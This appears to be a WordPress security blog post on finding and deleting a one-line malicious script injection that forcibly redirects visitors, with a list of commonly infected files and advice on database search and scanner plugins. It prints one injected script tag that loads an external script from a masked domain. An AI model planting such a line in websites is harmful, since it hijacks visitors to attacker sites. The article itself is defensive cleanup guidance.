If your WordPress site has been hacked and you think you have removed the tampering, but the site still redirects (forcibly) to another site, the malformed JAVASCRIPT code may still be there somewhere.


Embedding a single line of invalid JAVASCRIPT

The following code is embedded malicious JAVASCRIPT code (malware).

<script src="dock.********.com/m.js?ns=ns1" type="text/javascript"></script>

With just one line of code, this code calls and executes an external malicious script.
In general, this type of malicious embedding is difficult to detect by malware disinfection plug-ins and inspections because of the wide variety of callers and the weasel-word situation.

However, since Javascripts invoked from outside cannot rewrite or edit site files, they are less dangerous than dangerous PHP programs called backdoors.

Therefore, it is possible to find the above malicious code and remove it by simply deleting this one line.

How to find JAVASCRIPT injection

This single line of malicious JAVASCRIPT code is often embedded in a file that is always loaded when WordPress is called.
This is because hackers want to maximize their profits by redirecting users on every page of the defaced site.

Such files that are always loaded in WordPress are the following.

wp-config.php
index.php
header.php of the theme
theme’s footer.php
functions.php in theme
index.php in theme
sidebar.php in theme

Visually inspect for the presence of a single line of unrecognizable JS code like the one shown above here.

Examples embedded in the database

There are also rare cases where such JAVASCRIPT is embedded in the database.

In this case, a large amount of incorrect JAVASCRIPT code is written to database posts, and it is useful to use the Database Batch Search and Replace plugin to find and delete the incorrect code.

Search by Search Regex

We also recommend using a malware scanning disinfection plug-in. In some cases, you may be able to use the automatic removal function to remove all malware at once.
Free] WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].

Related Posts:

  1. WordPress site defacement hacking for SEO purposes. what is SEO spam?
    The most common type of WordPress tampering these days is the hacking of WordPress sites for SEO purposes. We will explain this SEO spam....
  2. Vulnerability in tagDiv Composer plugin bundled with WordPress Newspaper theme allows database rewriting
    A vulnerability in tagDiv Composer, a plugin included with the WordPress Newspaper theme, has been discovered that allows the database to be rewritten....
  3. 5 characteristics of malware files that infect WordPress
    Here are some characteristics of malware files that can infect WordPress. If such a file is found on the server, it is most likely malware....
  4. What is Japanese SEO Spam, a type of WordPress malware?
    We will explain about Japanese SEO Spam, which is a malware that embeds fake Japanese product sites in WordPress....
  5. If your wordpress index.php has a one line include statement @include it is infected with malware
    If there is a one-line include statement @include in the index.php in the top directory of WordPress or in the theme, etc., it is highly likely that the site is infected with malware....
  6. Change WordPress database prefix to prevent SQL injection
    You can reduce the chances of a successful SQL injection by changing the prefix of your WordPress database. We will explain how to do this....